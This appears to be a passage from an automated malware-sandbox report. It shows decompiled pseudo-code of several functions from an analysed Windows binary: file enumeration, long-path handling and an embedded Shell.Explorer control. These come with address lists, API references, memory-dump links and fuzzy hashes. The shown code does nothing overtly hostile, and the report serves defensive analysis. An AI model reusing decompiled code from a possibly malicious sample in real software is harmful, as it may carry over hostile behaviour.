															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E00EDAAF0(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E00EDF9D0);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E00ED3C6A(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E00EDD5AA(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E00EE3940( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E00EDFD92( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E00EDD9BD();
					_t219 = 0x16;
					 *_t148 = _t219;
					E00EDD89C();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}





















































































                                                                                                                0x00edf9ed
                                                                                                                0x00edf9f0
                                                                                                                0x00edf9f6
                                                                                                                0x00edfa0e
                                                                                                                0x00edfa11
                                                                                                                0x00edfa15
                                                                                                                0x00edfa17
                                                                                                                0x00edfa19
                                                                                                                0x00edfa1b
                                                                                                                0x00edfa1e
                                                                                                                0x00edfa21
                                                                                                                0x00edfa24
                                                                                                                0x00edfa26
                                                                                                                0x00edfa7e
                                                                                                                0x00edfa7e
                                                                                                                0x00edfa84
                                                                                                                0x00edfa86
                                                                                                                0x00edfa91
                                                                                                                0x00edfa95
                                                                                                                0x00edfa97
                                                                                                                0x00edfa9a
                                                                                                                0x00edfa9e
                                                                                                                0x00edfa9e
                                                                                                                0x00edfaa0
                                                                                                                0x00edfaa2
                                                                                                                0x00edfaa4
                                                                                                                0x00edfaa6
                                                                                                                0x00edfaa6
                                                                                                                0x00edfaa8
                                                                                                                0x00edfaab
                                                                                                                0x00edfaae
                                                                                                                0x00edfaae
                                                                                                                0x00edfab0
                                                                                                                0x00edfab1
                                                                                                                0x00edfab1
                                                                                                                0x00edfabc
                                                                                                                0x00edfabe
                                                                                                                0x00edfac1
                                                                                                                0x00edfac2
                                                                                                                0x00edfac5
                                                                                                                0x00edfac5
                                                                                                                0x00edfac9
                                                                                                                0x00edfacc
                                                                                                                0x00edfacf
                                                                                                                0x00edfacf
                                                                                                                0x00edfadd
                                                                                                                0x00edfadf
                                                                                                                0x00edfae2
                                                                                                                0x00edfae4
                                                                                                                0x00edfaee
                                                                                                                0x00edfaf1
                                                                                                                0x00edfaf4
                                                                                                                0x00edfaf6
                                                                                                                0x00edfaf9
                                                                                                                0x00edfafb
                                                                                                                0x00edfb4b
                                                                                                                0x00edfb4e
                                                                                                                0x00edfb4e
                                                                                                                0x00edfb50
                                                                                                                0x00000000
                                                                                                                0x00edfafd
                                                                                                                0x00edfaff
                                                                                                                0x00edfaff
                                                                                                                0x00edfb01
                                                                                                                0x00edfb04
                                                                                                                0x00edfb04
                                                                                                                0x00edfb09
                                                                                                                0x00edfb0c
                                                                                                                0x00edfb0c
                                                                                                                0x00edfb0e
                                                                                                                0x00edfb0f
                                                                                                                0x00edfb0f
                                                                                                                0x00edfb13
                                                                                                                0x00edfb16
                                                                                                                0x00edfb16
                                                                                                                0x00edfb19
                                                                                                                0x00edfb1c
                                                                                                                0x00edfb29
                                                                                                                0x00edfb2e
                                                                                                                0x00edfb31
                                                                                                                0x00edfb33
                                                                                                                0x00edfb6d
                                                                                                                0x00edfb6e
                                                                                                                0x00edfb6f
                                                                                                                0x00edfb70
                                                                                                                0x00edfb71
                                                                                                                0x00edfb72
                                                                                                                0x00edfb77
                                                                                                                0x00edfb7b
                                                                                                                0x00edfb7d
                                                                                                                0x00edfb7e
                                                                                                                0x00edfb81
                                                                                                                0x00edfb81
                                                                                                                0x00edfb84
                                                                                                                0x00edfb84
                                                                                                                0x00edfb86
                                                                                                                0x00edfb87
                                                                                                                0x00edfb87
                                                                                                                0x00edfb90
                                                                                                                0x00edfb91
                                                                                                                0x00edfb94
                                                                                                                0x00edfb97
                                                                                                                0x00edfb9a
                                                                                                                0x00edfb9c
                                                                                                                0x00edfba3
                                                                                                                0x00edfba5
                                                                                                                0x00edfba8
                                                                                                                0x00edfbb2
                                                                                                                0x00edfbb5
                                                                                                                0x00edfbb6
                                                                                                                0x00edfbb8
                                                                                                                0x00edfbcc
                                                                                                                0x00edfbcc
                                                                                                                0x00edfbcf
                                                                                                                0x00edfbd9
                                                                                                                0x00edfbde
                                                                                                                0x00edfbe1
                                                                                                                0x00edfbe3
                                                                                                                0x00000000
                                                                                                                0x00edfbe5
                                                                                                                0x00edfbe9
                                                                                                                0x00edfbf2
                                                                                                                0x00edfbf8
                                                                                                                0x00000000
                                                                                                                0x00edfbfb
                                                                                                                0x00edfbba
                                                                                                                0x00edfbba
                                                                                                                0x00edfbc0
                                                                                                                0x00edfbc5
                                                                                                                0x00edfbc8
                                                                                                                0x00edfbca
                                                                                                                0x00edfc01
                                                                                                                0x00edfc03
                                                                                                                0x00edfc04
                                                                                                                0x00edfc05
                                                                                                                0x00edfc06
                                                                                                                0x00edfc07
                                                                                                                0x00edfc08
                                                                                                                0x00edfc0d
                                                                                                                0x00edfc10
                                                                                                                0x00edfc11
                                                                                                                0x00edfc13
                                                                                                                0x00edfc19
                                                                                                                0x00edfc20
                                                                                                                0x00edfc23
                                                                                                                0x00edfc26
                                                                                                                0x00edfc27
                                                                                                                0x00edfc2a
                                                                                                                0x00edfc2b
                                                                                                                0x00edfc2e
                                                                                                                0x00edfc2f
                                                                                                                0x00edfc50
                                                                                                                0x00edfc50
                                                                                                                0x00edfc52
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edfc37
                                                                                                                0x00edfc39
                                                                                                                0x00edfc3b
                                                                                                                0x00edfc3d
                                                                                                                0x00edfc3f
                                                                                                                0x00edfc41
                                                                                                                0x00edfc43
                                                                                                                0x00edfc4e
                                                                                                                0x00000000
                                                                                                                0x00edfc4e
                                                                                                                0x00edfc43
                                                                                                                0x00edfc3f
                                                                                                                0x00000000
                                                                                                                0x00edfc3b
                                                                                                                0x00edfc54
                                                                                                                0x00edfc56
                                                                                                                0x00edfc59
                                                                                                                0x00edfc72
                                                                                                                0x00edfc72
                                                                                                                0x00edfc74
                                                                                                                0x00edfc77
                                                                                                                0x00edfc87
                                                                                                                0x00edfc89
                                                                                                                0x00edfc89
                                                                                                                0x00edfc79
                                                                                                                0x00edfc79
                                                                                                                0x00edfc7c
                                                                                                                0x00000000
                                                                                                                0x00edfc7e
                                                                                                                0x00edfc7e
                                                                                                                0x00edfc81
                                                                                                                0x00000000
                                                                                                                0x00edfc83
                                                                                                                0x00edfc83
                                                                                                                0x00edfc83
                                                                                                                0x00edfc81
                                                                                                                0x00edfc7c
                                                                                                                0x00edfc97
                                                                                                                0x00edfc9b
                                                                                                                0x00edfca9
                                                                                                                0x00edfcae
                                                                                                                0x00edfcc3
                                                                                                                0x00edfcc5
                                                                                                                0x00edfccb
                                                                                                                0x00edfcce
                                                                                                                0x00edfd00
                                                                                                                0x00edfd00
                                                                                                                0x00edfd05
                                                                                                                0x00edfd0b
                                                                                                                0x00edfd0b
                                                                                                                0x00edfd12
                                                                                                                0x00edfd2c
                                                                                                                0x00edfd2c
                                                                                                                0x00edfd2d
                                                                                                                0x00edfd33
                                                                                                                0x00edfd39
                                                                                                                0x00edfd3a
                                                                                                                0x00edfd3b
                                                                                                                0x00edfd40
                                                                                                                0x00edfd43
                                                                                                                0x00edfd45
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edfd14
                                                                                                                0x00edfd14
                                                                                                                0x00edfd1a
                                                                                                                0x00edfd1c
                                                                                                                0x00000000
                                                                                                                0x00edfd1e
                                                                                                                0x00edfd1e
                                                                                                                0x00edfd21
                                                                                                                0x00000000
                                                                                                                0x00edfd23
                                                                                                                0x00edfd23
                                                                                                                0x00edfd2a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edfd2a
                                                                                                                0x00edfd21
                                                                                                                0x00edfd1c
                                                                                                                0x00000000
                                                                                                                0x00edfd47
                                                                                                                0x00edfd4f
                                                                                                                0x00edfd55
                                                                                                                0x00edfd57
                                                                                                                0x00edfd57
                                                                                                                0x00edfd5f
                                                                                                                0x00edfd64
                                                                                                                0x00edfd6c
                                                                                                                0x00edfd6f
                                                                                                                0x00edfd71
                                                                                                                0x00edfd85
                                                                                                                0x00edfd8a
                                                                                                                0x00edfcd0
                                                                                                                0x00edfcd0
                                                                                                                0x00edfcd1
                                                                                                                0x00edfcd2
                                                                                                                0x00edfcd3
                                                                                                                0x00edfcd4
                                                                                                                0x00edfcdc
                                                                                                                0x00edfcdc
                                                                                                                0x00edfcdc
                                                                                                                0x00edfcde
                                                                                                                0x00edfce1
                                                                                                                0x00edfce4
                                                                                                                0x00edfce4
                                                                                                                0x00edfc5b
                                                                                                                0x00edfc5e
                                                                                                                0x00edfc60
                                                                                                                0x00000000
                                                                                                                0x00edfc62
                                                                                                                0x00edfc62
                                                                                                                0x00edfc65
                                                                                                                0x00edfc66
                                                                                                                0x00edfc67
                                                                                                                0x00edfc68
                                                                                                                0x00edfc6d
                                                                                                                0x00edfc60
                                                                                                                0x00edfcec
                                                                                                                0x00edfcf1
                                                                                                                0x00edfcfc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edfbca
                                                                                                                0x00edfb9e
                                                                                                                0x00edfba0
                                                                                                                0x00edfbfc
                                                                                                                0x00edfc00
                                                                                                                0x00edfc00
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edfb35
                                                                                                                0x00edfb38
                                                                                                                0x00edfb3b
                                                                                                                0x00edfb3e
                                                                                                                0x00edfb41
                                                                                                                0x00edfb44
                                                                                                                0x00edfb47
                                                                                                                0x00edfb47
                                                                                                                0x00000000
                                                                                                                0x00edfb04
                                                                                                                0x00edfae6
                                                                                                                0x00edfae6
                                                                                                                0x00edfb52
                                                                                                                0x00edfb54
                                                                                                                0x00000000
                                                                                                                0x00edfb59
                                                                                                                0x00edfa28
                                                                                                                0x00edfa28
                                                                                                                0x00edfa2b
                                                                                                                0x00edfa34
                                                                                                                0x00edfa37
                                                                                                                0x00edfa3e
                                                                                                                0x00edfa40
                                                                                                                0x00edfa59
                                                                                                                0x00edfa5a
                                                                                                                0x00edfa5b
                                                                                                                0x00edfa5d
                                                                                                                0x00edfa62
                                                                                                                0x00edfa42
                                                                                                                0x00edfa42
                                                                                                                0x00edfa45
                                                                                                                0x00edfa46
                                                                                                                0x00edfa48
                                                                                                                0x00edfa4a
                                                                                                                0x00edfa4c
                                                                                                                0x00edfa51
                                                                                                                0x00edfa51
                                                                                                                0x00edfa65
                                                                                                                0x00edfa67
                                                                                                                0x00edfa69
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edfa6f
                                                                                                                0x00edfa72
                                                                                                                0x00edfa74
                                                                                                                0x00edfa76
                                                                                                                0x00000000
                                                                                                                0x00edfa78
                                                                                                                0x00edfa78
                                                                                                                0x00edfa7b
                                                                                                                0x00000000
                                                                                                                0x00edfa7b
                                                                                                                0x00000000
                                                                                                                0x00edfa76
                                                                                                                0x00edfb5a
                                                                                                                0x00edfb5d
                                                                                                                0x00edfb62
                                                                                                                0x00000000
                                                                                                                0x00edfb65
                                                                                                                0x00edf9f8
                                                                                                                0x00edf9f8
                                                                                                                0x00edf9ff
                                                                                                                0x00edfa00
                                                                                                                0x00edfa02
                                                                                                                0x00edfa07
                                                                                                                0x00edfb66
                                                                                                                0x00edfb6a
                                                                                                                0x00edfb6a
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00EDFB54
                                                                                                                  • Part of subcall function 00EDD8AC: IsProcessorFeaturePresent.KERNEL32(00000017,00EDD89B,00000016,00EDD642,0000002C,00EEF510,00EE0AB6,?,?,?,00EDD8A8,00000000,00000000,00000000,00000000,00000000), ref: 00EDD8AE
                                                                                                                  • Part of subcall function 00EDD8AC: GetCurrentProcess.KERNEL32(C0000417,00EDD642,00000016,00EDE098), ref: 00EDD8D0
                                                                                                                  • Part of subcall function 00EDD8AC: TerminateProcess.KERNEL32(00000000), ref: 00EDD8D7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                • String ID: *?$.
                                                                                                                • API String ID: 2667617558-3972193922
                                                                                                                • Opcode ID: 0172720b29a6629538b55cfd7e2caf85fc12ed8373869cdb98db731bc57614c5
                                                                                                                • Instruction ID: c3d93784e35a6f2b26ac9c60b24bbe682c852f09a9f5f28321627c9775602145
                                                                                                                • Opcode Fuzzy Hash: 0172720b29a6629538b55cfd7e2caf85fc12ed8373869cdb98db731bc57614c5
                                                                                                                • Instruction Fuzzy Hash: 1A517E75E0020AAFDF14DFA8C881AADB7F5EF58314F24916BE859F7341E6359E028B50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC3399, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00EC3399(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				signed short* _t30;
				long _t32;
				short _t33;
				void* _t39;
				signed short* _t52;
				void* _t53;
				signed short* _t62;
				void* _t66;
				intOrPtr _t69;
				signed short* _t71;
				intOrPtr _t73;

				E00ED3370();
				_t71 = _a4;
				if( *_t71 != 0) {
					E00EC3528(_t71);
					_t66 = E00ED8683(_t71);
					_t30 = E00EC3554(_t71);
					__eflags = _t30;
					if(_t30 == 0) {
						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t32;
						if(_t32 == 0) {
							L22:
							_t33 = 0;
							__eflags = 0;
							L23:
							goto L24;
						}
						__eflags = _t32 - 0x7ff;
						if(_t32 > 0x7ff) {
							goto L22;
						}
						__eflags = E00EC358A( *_t71 & 0x0000ffff);
						if(__eflags == 0) {
							E00EC2FC6(__eflags,  &_v4100, 0x800);
							_t39 = E00ED8683( &_v4100);
							_t69 = _a12;
							__eflags = _t69 - _t39 + _t66 + 4;
							if(_t69 <= _t39 + _t66 + 4) {
								goto L22;
							}
							E00EC674F(_a8, L"\\\\?\\", _t69);
							E00EC6727(__eflags, _a8,  &_v4100, _t69);
							__eflags =  *_t71 - 0x2e;
							if(__eflags == 0) {
								__eflags = E00EC358A(_t71[1] & 0x0000ffff);
								if(__eflags != 0) {
									_t71 =  &(_t71[2]);
									__eflags = _t71;
								}
							}
							L19:
							_push(_t69);
							L20:
							_push(_t71);
							L21:
							_push(_a8);
							E00EC6727(__eflags);
							_t33 = 1;
							goto L23;
						}
						_t13 = _t66 + 6; // 0x6
						_t69 = _a12;
						__eflags = _t69 - _t13;
						if(_t69 <= _t13) {
							goto L22;
						}
						E00EC674F(_a8, L"\\\\?\\", _t69);
						_v4096 = 0;
						E00EC6727(__eflags, _a8,  &_v4100, _t69);
						goto L19;
					}
					_t52 = E00EC3528(_t71);
					__eflags = _t52;
					if(_t52 == 0) {
						_t53 = 0x5c;
						__eflags =  *_t71 - _t53;
						if( *_t71 != _t53) {
							goto L22;
						}
						_t62 =  &(_t71[1]);
						__eflags =  *_t62 - _t53;
						if( *_t62 != _t53) {
							goto L22;
						}
						_t73 = _a12;
						_t9 = _t66 + 6; // 0x6
						__eflags = _t73 - _t9;
						if(_t73 <= _t9) {
							goto L22;
						}
						E00EC674F(_a8, L"\\\\?\\", _t73);
						E00EC6727(__eflags, _a8, L"UNC", _t73);
						_push(_t73);
						_push(_t62);
						goto L21;
					}
					_t2 = _t66 + 4; // 0x4
					__eflags = _a12 - _t2;
					if(_a12 <= _t2) {
						goto L22;
					}
					E00EC674F(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L20;
				} else {
					_t33 = 0;
					L24:
					return _t33;
				}
			}
















                                                                                                                0x00ec33a1
                                                                                                                0x00ec33a7
                                                                                                                0x00ec33ae
                                                                                                                0x00ec33ba
                                                                                                                0x00ec33c7
                                                                                                                0x00ec33c9
                                                                                                                0x00ec33ce
                                                                                                                0x00ec33d0
                                                                                                                0x00ec3456
                                                                                                                0x00ec345c
                                                                                                                0x00ec345e
                                                                                                                0x00ec351d
                                                                                                                0x00ec351d
                                                                                                                0x00ec351d
                                                                                                                0x00ec351f
                                                                                                                0x00000000
                                                                                                                0x00ec3520
                                                                                                                0x00ec3464
                                                                                                                0x00ec3466
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec3475
                                                                                                                0x00ec3477
                                                                                                                0x00ec34bc
                                                                                                                0x00ec34c8
                                                                                                                0x00ec34d2
                                                                                                                0x00ec34d6
                                                                                                                0x00ec34d8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec34e3
                                                                                                                0x00ec34f3
                                                                                                                0x00ec34f8
                                                                                                                0x00ec34fc
                                                                                                                0x00ec3508
                                                                                                                0x00ec350a
                                                                                                                0x00ec350c
                                                                                                                0x00ec350c
                                                                                                                0x00ec350c
                                                                                                                0x00ec350a
                                                                                                                0x00ec350f
                                                                                                                0x00ec350f
                                                                                                                0x00ec3510
                                                                                                                0x00ec3510
                                                                                                                0x00ec3511
                                                                                                                0x00ec3511
                                                                                                                0x00ec3514
                                                                                                                0x00ec3519
                                                                                                                0x00000000
                                                                                                                0x00ec3519
                                                                                                                0x00ec3479
                                                                                                                0x00ec347c
                                                                                                                0x00ec347f
                                                                                                                0x00ec3481
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec3490
                                                                                                                0x00ec3497
                                                                                                                0x00ec34a9
                                                                                                                0x00000000
                                                                                                                0x00ec34a9
                                                                                                                0x00ec33d3
                                                                                                                0x00ec33d8
                                                                                                                0x00ec33da
                                                                                                                0x00ec3402
                                                                                                                0x00ec3403
                                                                                                                0x00ec3406
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec340c
                                                                                                                0x00ec340f
                                                                                                                0x00ec3412
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec3418
                                                                                                                0x00ec341b
                                                                                                                0x00ec341e
                                                                                                                0x00ec3420
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec342f
                                                                                                                0x00ec343d
                                                                                                                0x00ec3442
                                                                                                                0x00ec3443
                                                                                                                0x00000000
                                                                                                                0x00ec3443
                                                                                                                0x00ec33dc
                                                                                                                0x00ec33df
                                                                                                                0x00ec33e2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec33f3
                                                                                                                0x00ec33f8
                                                                                                                0x00000000
                                                                                                                0x00ec33b0
                                                                                                                0x00ec33b0
                                                                                                                0x00ec3521
                                                                                                                0x00ec3525
                                                                                                                0x00ec3525

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: UNC$\\?\
                                                                                                                • API String ID: 0-253988292
                                                                                                                • Opcode ID: ee037e3bea657aa506d40ecfae7a6ad2ff37f19cbd3345f0b9ed06e2a1d6c9b3
                                                                                                                • Instruction ID: c21c54a13c5ea7556f63d0441f63eb86403a8879939fa2d49fde917eff78940c
                                                                                                                • Opcode Fuzzy Hash: ee037e3bea657aa506d40ecfae7a6ad2ff37f19cbd3345f0b9ed06e2a1d6c9b3
                                                                                                                • Instruction Fuzzy Hash: 3341AF31400259BACF21AF70CE45FEB77EAEF04755B00A46EF864B3142D7779B869A60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECE326, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00ECE326(void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v4;
				signed int* _v20;
				void* __ebx;
				void* __ecx;
				void* __esi;
				intOrPtr _t21;
				char _t22;
				signed int* _t26;
				intOrPtr* _t28;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t49;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int* _t57;

				_t49 = __edi;
				_t34 = _t35;
				_t52 = _a4;
				 *((intOrPtr*)(_t34 + 4)) = _t52;
				_t21 = E00ED39E2(_t34, _t35, __edi, _t52, __eflags, 0x30);
				_v4 = _t21;
				if(_t21 == 0) {
					_t22 = 0;
					__eflags = 0;
				} else {
					_t22 = E00ECDB62(_t21);
				}
				 *((intOrPtr*)(_t34 + 0xc)) = _t22;
				if(_t22 == 0) {
					return _t22;
				} else {
					 *((intOrPtr*)(_t22 + 0x18)) = _t52;
					E00ECEB7F( *((intOrPtr*)(_t34 + 0xc)), L"Shell.Explorer");
					_push(1);
					E00ECEDDE();
					E00ECED74( *((intOrPtr*)(_t34 + 0xc)), 1);
					_t26 = E00ECEC71( *((intOrPtr*)(_t34 + 0xc)));
					_t57 = _t26;
					if(_t57 == 0) {
						L7:
						__eflags =  *((intOrPtr*)(_t34 + 0x10));
						if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
							E00ECDD76(_t34);
							_t28 =  *((intOrPtr*)(_t34 + 0x10));
							__eflags =  *((intOrPtr*)(_t34 + 0x20));
							_push(0);
							 *((char*)(_t34 + 0x25)) = 0;
							_t53 =  *_t28;
							_push(0);
							_push(0);
							_push(0);
							if( *((intOrPtr*)(_t34 + 0x20)) == 0) {
								_push(L"about:blank");
							} else {
								_push( *((intOrPtr*)(_t34 + 0x20)));
							}
							 *0xee7220(_t28);
							_t26 =  *((intOrPtr*)(_t53 + 0x2c))();
						}
						L12:
						return _t26;
					}
					_t10 = _t34 + 0x10; // 0x10
					_t30 = _t10;
					_v4 = _t30;
					 *0xee7220(_t57, 0xee914c, _t30, _t49);
					_t32 =  *((intOrPtr*)( *( *_t57)))();
					 *0xee7220(_t57);
					_t26 =  *((intOrPtr*)( *((intOrPtr*)( *_t57 + 8))))();
					if(_t32 >= 0) {
						goto L7;
					}
					_t26 = _v20;
					 *_t26 =  *_t26 & 0x00000000;
					goto L12;
				}
			}




















                                                                                                                0x00ece326
                                                                                                                0x00ece328
                                                                                                                0x00ece32b
                                                                                                                0x00ece331
                                                                                                                0x00ece334
                                                                                                                0x00ece339
                                                                                                                0x00ece340
                                                                                                                0x00ece34b
                                                                                                                0x00ece34b
                                                                                                                0x00ece342
                                                                                                                0x00ece344
                                                                                                                0x00ece344
                                                                                                                0x00ece34d
                                                                                                                0x00ece352
                                                                                                                0x00ece405
                                                                                                                0x00ece358
                                                                                                                0x00ece359
                                                                                                                0x00ece364
                                                                                                                0x00ece36c
                                                                                                                0x00ece36e
                                                                                                                0x00ece378
                                                                                                                0x00ece380
                                                                                                                0x00ece385
                                                                                                                0x00ece389
                                                                                                                0x00ece3ca
                                                                                                                0x00ece3ca
                                                                                                                0x00ece3ce
                                                                                                                0x00ece3d2
                                                                                                                0x00ece3d7
                                                                                                                0x00ece3dc
                                                                                                                0x00ece3df
                                                                                                                0x00ece3e0
                                                                                                                0x00ece3e3
                                                                                                                0x00ece3e5
                                                                                                                0x00ece3e6
                                                                                                                0x00ece3e7
                                                                                                                0x00ece3eb
                                                                                                                0x00ece3f2
                                                                                                                0x00ece3ed
                                                                                                                0x00ece3ed
                                                                                                                0x00ece3ed
                                                                                                                0x00ece3f8
                                                                                                                0x00ece3fe
                                                                                                                0x00ece3fe
                                                                                                                0x00ece401
                                                                                                                0x00000000
                                                                                                                0x00ece401
                                                                                                                0x00ece38e
                                                                                                                0x00ece38e
                                                                                                                0x00ece39d
                                                                                                                0x00ece3a1
                                                                                                                0x00ece3a7
                                                                                                                0x00ece3b4
                                                                                                                0x00ece3ba
                                                                                                                0x00ece3bf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ece3c1
                                                                                                                0x00ece3c5
                                                                                                                0x00000000
                                                                                                                0x00ece3c5

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Shell.Explorer$about:blank
                                                                                                                • API String ID: 0-874089819
                                                                                                                • Opcode ID: ee75535e30d12b1ecf7ec524b0c2eec23fdf511b2cfb77846513238e454c946c
                                                                                                                • Instruction ID: 6e099fcdef3fba194ffbe0eb2a80e8c7b44f6a8aaeb7af352f6a32e07d0b7668
                                                                                                                • Opcode Fuzzy Hash: ee75535e30d12b1ecf7ec524b0c2eec23fdf511b2cfb77846513238e454c946c
